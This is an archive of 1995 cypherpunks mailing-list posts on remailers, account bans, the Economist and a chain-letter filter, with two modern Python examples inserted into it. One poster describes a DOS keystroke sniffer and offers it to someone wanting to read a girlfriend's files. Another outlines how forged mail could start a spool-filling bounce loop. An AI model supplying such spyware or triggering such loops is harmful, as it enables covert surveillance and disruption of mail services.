replaces the keyboard interrupt and stores all keystrokes in a buffer.

It was very very easy to write.

It works while using pgp and windows\net.

It does not work after starting windows.  Not sure, but it seems obvious
that MS windows installs its own keyboard interrupt.

I suppose it would be easy to enhance this simple program (I bet it's been
done by others) to store passwords into a secret file on a hard drive
unbeknownst to the user.

I first suspected that such a program already existed after hearing, two
days after his arrest, that the CIA had cracked Aldrich Aim's encrypted
files.   (sorry if I spelled his name incorrectly.)

Think about it, the govt. could spend 50,000 to 100,000 to create a 
freeware gif viewer, for example, that installed such a tsr.

Mike

P.S.  If the guy who wanted to see his gf's files writes me, I'll send you
this keyboard sniffer program.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Thu, 5 Jan 95 23:11:22 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Siegel and Lewis
In-Reply-To: <9501041424.AA25564@tadpole.tadpole.com>
Message-ID: <Pine.3.89.9501060003.C6821-0100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 4 Jan 1995, Doug Barnes wrote:

> 
> Why is it that so many cypherpunks like the economist?
> 
> I learned recently that Eric is a big fan. So am I. You're certainly 
> not the first other cypherpunk to mention this. Weird. I mean, it's
> not exactly a radical publication... it just gets its *&#$*#$ facts
> right. Probably this is it.
> 
> Doug
> 

The reason is, and I do not presume to speak for other individuals on 
this list, the Economist looks at the world from an independent (i.e. not 
owned by one of the major publishing houses, if I'm not mistaken) point 
of view, and is not afraid to pursue different analysis of a topic.

I will also venture that the closest that we have in the US is Forbes.

Dan
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Thu, 5 Jan 95 23:55:22 PST
To: cypherpunks@toad.com
Subject: All I did was properly crosspost!
Message-ID: <Pine.3.89.9501060124.B12234-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



I first saw the Dubois Letter in alt.security.pgp the 28th.
PRZ posted it here the next day.

I "crossposted" it to my favorite 10 newsgroups. Just 10.
Some creep complained. (we'll get to him a bit later).

I didn't get a chance to get back on-line for 3 1/2 days.
I was lied to.

I am hurt. My mail has been stolen.
I haven't read any of you for four days now.

My web pages are vulnerable.
Is there somebody who can please help me get my 2 megs of mail?
I can't get at your keys.

http://www.winternet.com/~carolann/coffee.html has the cypherpunk
rant links on the page. I'm proud of them, and proud to be on this list.

But to take my account away for crossposting to 10 groups is not right.

I'll be back with a better chronology.

Love Always,

Carol Anne
ps Hope you like (and feel free to use) my new .sig





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Thu, 5 Jan 95 23:59:42 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.3.89.9501060003.C6821-0100000@Joyce-Perkins.tenet.edu>
Message-ID: <Pine.3.89.9501060235.C12234-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Guess I'm worse than Siegel & Lewis now, huh?

On Fri, 6 Jan 1995, Dan Harmon wrote:
> On Wed, 4 Jan 1995, Doug Barnes wrote:
> > Why is it that so many cypherpunks like the economist?
> > I learned recently that Eric is a big fan. So am I. You're certainly 
> > not the first other cypherpunk to mention this. Weird. I mean, it's
> > not exactly a radical publication... it just gets its *&#$*#$ facts
> > right. Probably this is it.
> > Doug
> The reason is, and I do not presume to speak for other individuals on 
> this list, the Economist looks at the world from an independent (i.e. not 
> owned by one of the major publishing houses, if I'm not mistaken) point 
> of view, and is not afraid to pursue different analysis of a topic.
> 
> I will also venture that the closest that we have in the US is Forbes.
> 
> Dan
>   
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 00:02:03 PST
To: cypherpunks@toad.com
Subject: Re: public vs. private replies
Message-ID: <199501060807.DAA22166@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Tim May writes:
> [...] has asked that we reply in e-mail to him, to avoid
> "cluttering the list more than I already have...," but the logic of
> this is faulty. The few lines of a response such as this one, or even
> of several such responses, are as nothing compared to dozens or more
> people sifting their own archives so they can each independently send
> [...] what they find. Hence my public reply.

I'd like to amplify this point, which is missed all too often on Usenet and
mailing lists. Replies to requests for fairly widely-known factual information
should be directed to the forum (i.e. the mailing list, newsgroup, or what 
have you). This practice not only prevents duplication of effort by the 
repliers, as Tim mentioned, but also prevents duplication of effort by others 
interested in the same answer. I try to make a point of replying to the whole 
list when someone asks for a list of remailers, mail-news gateways, etc. for 
precisely this reason.

As I see it the basic principle rests on a simple comparison of the number of
replies desired with the likely number of replies. If you anticipate getting
many more replies than you want, you should ask for replies to the entire
forum in which you place the query. Otherwise, seek private email. This is
certainly not a perfect heuristic, but it's an excellent starting point IMHO.

For example, a few months back I wanted to give away an old AM/FM/
shortwave radio, so I posted to a local newsgroup. I asked for initial public 
replies, so that I wouldn't be flooded with mail before I had the chance to
announce that a recipient had been selected (first-come first-served). After
the initial expression of interest, further correspondence continued in 
private.

[...]
> In my opinion, having personal access
> to past posts is several orders of magnitude more important than
> having MIDI-MIME JPEG-II TeX players [...]

It takes more disk space from one's personal quota, though (for those who
suffer under such restrictions). :[

Let's not head down this road again....
"You've gotta keep `em separated !" -Offspring

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwz5Mmf7YYibNzjpAQEooAQAlj93pc1CuSMTdApaRTg06ONgPkeyqUfY
KhdcqzDmEnuWBDdwgO+YtHOHFsOGlPhoFhOijajJzTh97G1TBYn5plBECaZXs1RJ
Au9g1uqEAKtFLFYB/jKDaDA/Xzf13irCKb846IAhttKICwQJ8HfLfgPWLHMa1/f1
ldkXYq7DfY8=
=7KNc
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwz6PCoZzwIn1bdtAQGpbwGAqY6tLm7TAN2TluCpD1WOTsR6kMgI2R27
CMExwcLopwSapiPNO0u/IHnzHUq5ij2C
=TyKQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 01:21:47 PST
To: Thaddeus Ozone <drozone@winternet.com>
Subject: We still don't have the mailbox.
In-Reply-To: <m0rQAWh-000SwqC@icicle.winternet.com>
Message-ID: <Pine.3.89.9501060352.D12376-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Thanks Doc. Wrote Phil Dubois, Zimmy's Lawyer. It's something I'll show you
a copy of when I get back to playing "catch-up".

Love Always,

Carol Anne

On Fri, 6 Jan 1995, Thaddeus Ozone wrote:

> Carol, 
> I DL'd the whole thang. If it was world-readable, I've got it locked up on
> my hard drive. I'll have to wait until I can get my hands on some 800k
> disks, it takes up 1776k on my hard drive, but should fit on 2 - 800k's
> once it gets transferred. I took the liberty of taking EVERYTHING that was
> readable, including what was in the main directory. Talk to you over the
> weekend.
>    Your pal,   -doc-
> 
> >I tried again, even from my pages.
> >I do believe it's the local server that's gotta do the job.
> >Anyway, I'm bookmarking all the links.
> >And downloading all the pages.
> >Will go ftp here in a minute.
> >
> >Love Always,
> >
> >Carol Anne
> >more in about an hour.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 00:55:49 PST
To: cypherpunks@toad.com
Subject: Re: All I did was properly crosspost!
Message-ID: <199501060901.EAA22716@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[I'm cc:ing this to C. A. Braddock's new address and her ex-sysadmin, in 
addition to the cypherpunks list. --L. Futplex McCarthy]

Carol Anne Braddock writes:
> I first saw the Dubois Letter in alt.security.pgp the 28th.
> PRZ posted it here the next day.
> 
> I "crossposted" it to my favorite 10 newsgroups. Just 10.

Posting letters asking for $$$ is of course a risky venture on Usenet. We
see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
your hand, you'd better be doing it in the right place. My frank reaction as a
veteran Usenetter is that 10 newsgroups sounds like rather a lot, especially
when that presumably excludes the groups like a.s.pgp to which the letter was
originally posted. To which 10 newsgroups did you repost the letter ?

[...]
> Is there somebody who can please help me get my 2 megs of mail?

I believe it's questionable whether your old system is under any legal
obligation to provide access to your accumulated mail there. As I recall,
Netcom ended up deleting most of the deluge of mail Canter & Siegel received 
after their infamous spam. However, in this instance it does seem that it
would be polite (and good P.R.) to give you access to the mail your account 
has received.
Apologize and ask your former admin nicely, and you might well get it. He
could move it to an anon-ftp directory, perhaps encrypted with some public
key of yours :)

[...]
> But to take my account away for crossposting to 10 groups is not right.

Well, it depends greatly upon what you posted and where. If I posted the PRZ
Appeal to *my* ten favorite newsgroups (including alt.config, alt.religion.
kibology, and alt.sexual.abuse.recovery), I'd certainly expect to face trouble
and perhaps lose posting privileges. 

[...]
> Login name: carolann 			In real life: CarolAnne Braddock
> Directory: /usr2/carolann           	Shell: /etc/scripts/tcsh-susp
> Last login Thu Jan  5 21:38 on ttyq5 from annex3-1.wintern
> New mail received Thu Jan  5 21:16:23 1995;
>   unread since Mon Jan  2 13:18:25 1995
> Plan:
> This account has been disabled permanently.
> 
> Mike Horwath - Admin - Winternet - drechsau@winternet.com

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0Fu2f7YYibNzjpAQGwoAP/RrXUl3vguSSJSvGDNKsXIMek61Ay5Cvy
xFO/NWcyZpzXkqwF3w19DOtke1EQ1NuPP7Z9luN6zF/QkqNwS6Z0mAMc8hcI0kLg
F3ESx06UABPJMQoVY63BtaDYuj6Dualjs903koAliIUhpITZ+qsf7jaj3qT1FtMa
d3SzHqOWGYM=
=876P
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0G3CoZzwIn1bdtAQHTCQGAgs4itNl5sAZMFjgMIx4Gef52o49+4q3k
m36gnACMfYDMThQyhcOS8udSMFw3YM4Q
=uty3
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 01:09:01 PST
To: cypherpunks@toad.com
Subject: Re: sniff passwords on PC (DOS)
Message-ID: <199501060914.EAA22804@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mike writes:
> days after his arrest, that the CIA had cracked Aldrich Aim's encrypted
> files.   (sorry if I spelled his name incorrectly.)

FYI, I'm fairly sure it's "Aldrich Ames".

> Think about it, the govt. could spend 50,000 to 100,000 to create a 
> freeware gif viewer, for example, that installed such a tsr.

...most of that going to Compu$erve/Uni$y$...

> P.S.  If the guy who wanted to see his gf's files writes me, I'll send you
> this keyboard sniffer program.

Just to clarify slightly, the person who originally asked the question (Adam
Gerstein aka THE MAC GURU) said he had a _friend_ who wanted to see his (the
friend's) gf's files.

- - -L. Futplex McCarthy



- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0I8mf7YYibNzjpAQEF/wP9GPKLX7KifBFRenzmbvsCdbOQ7Narlm8/
qiW/nSLRr7jZUtjAyhYM71eI9GsQbO6lADfV9ncoPIATNB/eJNCqa2O0cmNa67O/
KuUSQl0NQPiUQyevkLRldllEb9hSuTNeHyJZ4SFDpMbFrGYXX4Iu/w9RYcn9ssNS
29qFs0vNK30=
=Z0ZM
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0J9ioZzwIn1bdtAQHXVgF8CVyuTHInzoYDUZmZZXwksIosAuiP4TSh
pfZJLbRcoPPP9sJ63CTfnexZXenEzhLf
=zrNo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 6 Jan 95 02:05:21 PST
To: cypherpunks@toad.com
Subject: Chain letter bounced (fwd)
Message-ID: <199501061011.FAA23248@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

A small advisory: since na166182@anon.penet.fi is subscribed to the c'punks
list, and anon.penet.fi attempts to filter out instances of Make Money Fast,
any mention of "MAKE.MONEY.FAST" on the list will likely generate an autoreply
like the one below. It appears that a copy of the MAKE.MONEY.FAST FAQ (there,
I've said it again :) included in the autoreply will even trigger this 
mechanism, which is awfully ironic at best. At worst, this self-referential
property seems liable to allow some nasty email feedback loops. Offhand it
appears that a message with an address @anon.penet.fi (preferably forged) in
the From: line, and "MAKE.MONEY.FAST" as the message body, would launch an
automatic recursive bounce process as anon.penet.fi attempts to send itself
a message it considers illegal. Presumably this would crash when the disk
quota on some mail spool somewhere is exceeded. If the message was forged
to come From: cypherpunks@toad.com or another list to which an anon.penet.fi
user is subscribed, I imagine the list would have the dubious privilege of
witnessing all the recursive bounce messages along the way.

I'm not volunteering to try to write a better MMF-recognizer for a.p.f, 
though....

Forwarded message:
> From daemon@anon.penet.fi Fri Jan  6 04:22:39 1995
> To: lmccarth@ducie.cs.umass.edu
> Subject: Chain letter bounced
> 
> You, lmccarth@ducie.cs.umass.edu, have sent a message that seems to contain yet another
> copy of the infamous Make Money Fast chain letter.
> 
> If you want to make a complaint, please send just the headers of the
> message to admin@anon.penet.fi - albeit as the messages have been blocked
> (as you can see), the message probably *didn't* go through anon.penet.fi
> but was faked (using NNTP faking or something similar).
> 
[...]
> To: cypherpunks@toad.com
> From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
[...]
> Posting letters asking for $$$ is of course a risky venture on Usenet. We
> see the PRZ Appeal as a Worthy Cause (tm), but that's just what all the
> MAKE.MONEY.FAST posters think of their garbage too. If you go sticking out
[...]

 -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLw0WJGf7YYibNzjpAQEfxAQAiA70W8v7saU4TU+0yJL4XC44uhV50Q34
rX5T1A1ADbPgKeIEX/nImyRP2h6T+V2GdYBWPMJjlVYV1Nyqpxb2kHToocQCbtjd
ILyNYew0zHfpZAPeYYM4Y35ru1LoQeg9+COo9RElkS3daMB2gtUjmY2EtfPF6h4V
tDei1OHtdl0=
=vxjA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLw0XKioZzwIn1bdtAQE2egF/Z5Tjg/dzt8cc/lkFXA/LMd17nNNGYv8N
7E7qlnWAhdz82+cILCVHmfVpHNIfdTUH
=xtDg
-----END PGP SIGNATURE-----
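
The feedback loop described in the message above, seen from the side of whoever runs such a filter. This is an added example, not code from anon.penet.fi or from the poster: it sketches an auto-responder that refuses to answer itself, answers any one sender at most once per window, and quotes only headers so its own notice cannot re-trigger the filter. The domain, daemon address, limits and sample messages are assumptions constructed for illustration.

```python
"""Loop guard for an automatic "message blocked" notice (added example)."""
import time
from email import message_from_string
from email.message import EmailMessage
from email.utils import parseaddr

OWN_DOMAIN = "filter.example"        # assumption: domain that runs the filter
DAEMON = "daemon@" + OWN_DOMAIN      # assumption: address the notices come from
BULK_PRECEDENCE = {"bulk", "junk", "list"}


class BounceGuard:
    """Decides whether a notice may be sent for one blocked message."""

    def __init__(self, max_per_window=1, window=86400, clock=time.time):
        self.max_per_window = max_per_window
        self.window = window
        self.clock = clock
        self._sent = {}              # sender address -> times notices were sent

    def decide(self, raw):
        """Return (send_notice, reason)."""
        msg = message_from_string(raw)
        sender = parseaddr(msg.get("From", ""))[1].lower()
        if "@" not in sender:
            return False, "no usable sender"
        # A From: line in our own domain is forged or is our own notice coming
        # back; answering it would mean mailing ourselves.
        if sender.rsplit("@", 1)[1] == OWN_DOMAIN:
            return False, "sender is in our own domain"
        if DAEMON in msg.get("X-Loop", "").lower():
            return False, "our X-Loop marker is present"
        if msg.get("Auto-Submitted", "no").strip().lower() != "no":
            return False, "message is itself automatic"
        if msg.get("Precedence", "").strip().lower() in BULK_PRECEDENCE:
            return False, "bulk or list traffic"
        # Even a well-formed sender gets a bounded number of notices.
        now = self.clock()
        recent = [t for t in self._sent.get(sender, []) if now - t < self.window]
        if len(recent) >= self.max_per_window:
            self._sent[sender] = recent
            return False, "rate limit reached for this sender"
        self._sent[sender] = recent + [now]
        return True, "ok"


def build_notice(raw):
    """Build the notice: marked automatic, quoting a few headers, never the
    Subject or body, so the blocked text is not echoed back through the filter."""
    msg = message_from_string(raw)
    notice = EmailMessage()
    notice["From"] = DAEMON
    notice["To"] = parseaddr(msg.get("From", ""))[1]
    notice["Subject"] = "Message blocked by content filter"
    notice["Auto-Submitted"] = "auto-replied"
    notice["X-Loop"] = DAEMON
    quoted = "\n".join(
        f"> {name}: {msg[name]}"
        for name in ("From", "To", "Date", "Message-ID") if msg[name]
    )
    notice.set_content("Your message was blocked. Its headers were:\n\n" + quoted + "\n")
    return notice


# Constructed sample messages (not taken from the archive).
BLOCKED = (
    "From: Alice <alice@site.example>\n"
    "To: an1234@filter.example\n"
    "Message-ID: <1@site.example>\n"
    "Subject: about CHAIN-LETTER-TRIGGER\n\n"
    "A post that merely mentions CHAIN-LETTER-TRIGGER.\n"
)
FORGED_SELF = (
    "From: an9999@filter.example\n"
    "To: an1234@filter.example\n\n"
    "CHAIN-LETTER-TRIGGER\n"
)
VIA_LIST = (
    "From: bob@site.example\n"
    "To: list@lists.example\n"
    "Precedence: bulk\n\n"
    "CHAIN-LETTER-TRIGGER mentioned on a list.\n"
)

if __name__ == "__main__":
    guard = BounceGuard()
    for label, raw in (("blocked", BLOCKED), ("blocked again", BLOCKED),
                       ("forged self", FORGED_SELF), ("via list", VIA_LIST)):
        print(label, guard.decide(raw))
    print(build_notice(BLOCKED).as_string())
```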




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 6 Jan 95 03:23:19 PST
To: cypherpunks@toad.com
Subject: Re: C'punks Economist Fan Club
Message-ID: <199501061123.AA10001@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>It's witty, politically
>aware, relatively technically savvy. The articles exhibit a healthy (IMHO)
>cynicism about what happens and why, yet maintain some idealism about what
>should happen. It's not perfect, but it's difficult to imagine surpassing it.

The Economist is fully informed and funny.  What domestic news magazine
would include the following in one of *their* leads (editorials):

Circa 1987

"It is unlikely that Gorbachev has included an invasion of Western Europe in
his next Five Year Plan but his generals *have* made their preparations.
Lucky Britain is in the *Polish* Army's Zone of Occupation."

DCF

--
Have you registered a domain today.  My template worked first time and I
have since registered nine domain names.  Send for a free copy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frissell@panix.com (Duncan Frissell)
Date: Fri, 6 Jan 95 03:23:20 PST
To: cypherpunks@toad.com
Subject: Re: True Names
Message-ID: <199501061123.AA10015@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>--Mike, still looking for a copy himself
>

Boy, for people who can make the World's Governments tremble with the click
of a keyboard some of you seem a bit print disabled.

How to buy an Out of Print Book (c) 1995 Offshore Enterprises

1)  Find an OP book search specialist
2)  Ask him/her to find it for you
3)  Pay for it

To accomplish 1), ask at (independent) bookstores in your vicinity (those
are places you may have seen around town full of processed tree carcasses),
libraries, etc.  

DCF

--
Correlation between (40 years of pack-a-day) second-hand smoke and cancer: +1.19
Correlation between having had an abortion and cancer: +1.50
Correlation generally accepted as significant for disease studies: +3.00





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 04:28:54 PST
To: db@Tadpole.COM
Subject: Re: Remailer Abuse
In-Reply-To: <4748.789282395.1@nsb.fv.com>
Message-ID: <Aj3HRaf0Eyt5ExIApP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 5-Jan-95 Re: Remailer Abuse db@Tadpole.COM (1180*)

> Heh. An anonymous remailer paid for by credit card... there'd
> have to be an additional level of indirection for it to work,
> which would make the methods for tracking those who don't pay
> quite problematic.

Again, this comes down to definitions of anonymity.  In this case, if
you start from the silly assumption that the anonymous remailer actually
keeps records that correlate messages to payment mechanisms, Doug is
right, but barely.  To break the anonymity, you'd need collusion between
the operator of the anonymous remailer AND First Virtual, because the
former knows which account sent a message, and the latter knows who that
account belongs to.  (And before you tell me that this sounds a lot like
the Clipper key escrow, I would point out that instead of two "trust us,
they're independent" agencies of the US government, in this case we're
talking about two independent private companies which are probably in
two different countries.  For my part, I figure that if the government
of Finland and the government of the US can actually agree that it's so
important to force the sacrifice of anonymity in a given case that
they're both willing to coerce companies under their jurisdiction, they
will probably have a very good reason for doing so.   Maybe I'm too
trusting, though.)

Moreover, and perhaps most important, even THIS can only be done if the
anonymous mailer keeps records of WHICH account paid for WHICH posting,
and if I were to operate a for-pay remailer, I wouldn't do that anyway. 
It sort of defeats the whole point of the service.

> Also, most remailer abuse tends to be of the hit-and-run variety,
> which is still nicely enabled by FV.

Only if you assume that the same people aren't responsible for multiple
hit-and-run attacks.  I would tend to assume the opposite.

Russ Nelson saw the first point quite clearly, and wrote:

Excerpts from mail: 5-Jan-95 Re: Remailer Abuse nelson@crynwr.com (1177)

> Sure, I'll know who used it, but I'm not going to keep that
> information.  (Yes, yes, FV says that I have to keep records of who
> bought what, but I'll label all my information with a random number,
> that simply says that X bought information worth Y, not *what*
> information.)  And if you don't trust a remailer operator, then you
> won't use it.

All I'd add here is that the requirement to keep records is one that we
have to pass on from the credit card world.  If you didn't keep ANY
records, my understanding is that all that this would really mean in
practice is that there would be an extremely strong presumption AGAINST
you in certain dispute-resolution situations.  That's just my
understanding, however, and it doesn't in any way supersede or
supplement our legal terms and conditions, available from
fineprint@fv.com.  (You should try them, I find them more effective than
Sominex.)

Excerpts from mail: 5-Jan-95 Re: Remailer Abuse wcs@anchor.ho.att.com (2028)

> I'd be worried about a couple of issues - 
> one is just the transaction cost - can you successfully market remailer use
> at a buck a shot or whatever you'd be charging beyond FV's 29c stamp,
> or would you have some convenient way to aggregate bill?

Depending on how often you aggregate, you can charge almost any amount. 
20 cents might be very reasonable.  If you run a cron job once a month
to post aggregated billings to anyone who had two or more outstanding
uses, you'd make only a small amount on the two-time users, but you'd
get serious aggregation from the regular users.  (You might also want to
bill the really-high-volume users weekly, to prevent them from going
into shock at their huge monthly bills.)

> Beyond that, though, are some traffic analysis problems -
> remailers require a fair bit of traffic to be useful, and unless
> you receive a reasonable amount of encrypted traffic, 
> and support encrypted email for purchasing remailer service
> and other merchandise, an eavesdropper would have a fairly good source
> of traffic data on your remailer users, especially since buying and using 
> remailer service requires two messages within an hour or so.

Well, I think low-volume remailers are always a bit vulnerable to
traffic analysis attacks, aren't they?    One thing you could do is
build a variable time-delay into the remailer, to make it harder to
correlate messages coming in with those going out.  To take paranoia a
step further, you could allow people to encrypt their mail TO an
anonymous remailer with the remailer's public key, and let the remailer
send it out unencrypted.  No snooper should be able to correlate the
*contents* that way, and it avoids lots of key management problems by
only using the remailer's key, not the user's. 

> An alternative billing mechanism, which wouldn't use Chaum-patented cash,
> would be to sell a bunch of one-shot random-number tokens.
> When you sell the tokens, you add them to the database of valid tokens,
> and when one comes in on a message you delete it.
> This allows you to sell more than one message or service-period per 
> FV transaction, and separates the purchase and use by a longer time,
> without adding the need for record-keeping based on the user's ID.
> It obviously does require encrypted reply messages.

I think this could work quite nicely, at first glance.  This is also the
kind of service for which you might want to wait until after the "yes"
reply to deliver the "goods".   My only concern would be the key
management issues, but they might be manageable in this case by using
the equivalent of a session key, instead of a permanent personal key.  I
think this is a promising idea.    -- Nathaniel
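
The one-shot token scheme quoted in the message above, as an added example that is not code from any of the posters or from First Virtual: tokens are added to a database when sold and deleted when one arrives on a message, with no buyer identity stored. The `Remail-Token` header name, the SQLite storage and the choice to store only SHA-256 digests of tokens are assumptions made for this sketch.

```python
"""One-shot prepaid tokens for a remailer (added example; names are assumptions)."""
import hashlib
import secrets
import sqlite3
from email import message_from_string

TOKEN_HEADER = "Remail-Token"        # hypothetical header carrying the token
STRIP_HEADERS = (TOKEN_HEADER, "From", "Message-ID", "Received")


class TokenStore:
    """Database of valid tokens. It holds digests only and no purchaser data,
    so neither a copy of the table nor the operator can link a token to a sale."""

    def __init__(self, path=":memory:"):
        self.db = sqlite3.connect(path)
        self.db.execute("CREATE TABLE IF NOT EXISTS valid (digest BLOB PRIMARY KEY)")

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8", "replace")).digest()

    def sell(self, count):
        """Create `count` random tokens, record them as valid, return them.
        The caller delivers them to the buyer (encrypted, as the post notes)."""
        tokens = [secrets.token_urlsafe(16) for _ in range(count)]
        with self.db:                # one transaction for the whole batch
            self.db.executemany(
                "INSERT INTO valid VALUES (?)",
                [(self._digest(t),) for t in tokens],
            )
        return tokens

    def redeem(self, token):
        """Delete the token if it is valid. The DELETE is the check, so a
        token can be spent exactly once even if two messages race."""
        with self.db:
            cur = self.db.execute(
                "DELETE FROM valid WHERE digest = ?", (self._digest(token),)
            )
        return cur.rowcount == 1

    def outstanding(self):
        return self.db.execute("SELECT COUNT(*) FROM valid").fetchone()[0]


def accept_for_remailing(store, raw):
    """Return the message text to forward, or None if no valid token is attached.
    The token and the sender-identifying headers are removed before forwarding."""
    msg = message_from_string(raw)
    token = (msg.get(TOKEN_HEADER) or "").strip()
    if not token or not store.redeem(token):
        return None
    for name in STRIP_HEADERS:
        del msg[name]                # removes every occurrence; no error if absent
    return msg.as_string()


if __name__ == "__main__":
    store = TokenStore()
    first, *rest = store.sell(5)     # one purchase, five later uses
    # Constructed sample message.
    raw = (
        "From: buyer@site.example\n"
        "To: someone@elsewhere.example\n"
        f"{TOKEN_HEADER}: {first}\n\n"
        "hello\n"
    )
    print(accept_for_remailing(store, raw))      # forwarded text, token removed
    print(accept_for_remailing(store, raw))      # None: token already spent
    print(store.outstanding())                   # 4
```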




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 06:40:49 PST
To: Duncan Frissell <frissell@panix.com>
Subject: Re: C'punks Economist Fan Club
In-Reply-To: <199501061123.AA10001@panix.com>
Message-ID: <Pine.3.89.9501060851.A12548-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



This I hope shows I can keep my humor level a bit.
How does "CENSORED.COM" sound?

My original reply is still in suspended composition.

On Fri, 6 Jan 1995, Duncan Frissell wrote:
> Have you registered a domain today.  My template worked first time and I
> have since registered nine domain names.  Send for a free copy.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 07:02:07 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: All I did was properly crosspost!
In-Reply-To: <Pine.3.89.9501060124.B12234-0100000@downburst.mm.com>
Message-ID: <Pine.3.89.9501060852.B2432-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Carol Anne Braddock wrote:

> 
> I first saw the Dubois Letter in alt.security.pgp the 28th.
> PRZ posted it here the next day.
> 
> I "crossposted" it to my favorite 10 newsgroups. Just 10.
> Some creep complained. (we'll get to him a bit later).
>
Ten is not a large number when it comes to cross-posting on some topics, I 
can think of at least twenty newsgroups where the PRZ letters and such 
would make a lot of sense and be on topic.  This just goes to show the 
sometimes reactionary steps people take to control spamming.  It leads to 
people getting hurt, especially when the sysop at your site is not 
intelligent enough to look at the article, and see whether or not it was 
cross-posted to valid groups etc., and not only that, but to completely 
pull your account for such a small thing (ten groups?  that's nothing in 
comparison to some articles out there still going).  What is the name of the 
sysop at that site your account was pulled from?  
 
> But to take my account away for crossposting to 10 groups is not right.
>
I agree, ten groups is a small amount, especially if they are at least 
marginally on topic.  

This is something that we need to watch out for tho, it makes people 
fearful of spreading information, when even if you spread it in a nice 
manner, to on-topic groups etc., you face the chance of some bozo 
net-vigilante complaining to your sysop and having your account yanked. 
From the evidence here it seems the sysop acted in a reactionary manner, 
probably out of fear of some asshole mailbombing your account.  

I heartily recommend that those of you who do not know your site's 
policies for such become acquainted with them, or at least contact the 
sysop and talk about this issue.  If you contact him and talk to him(her) 
about it then they are less likely to react so quickly and IMO stupidly.  
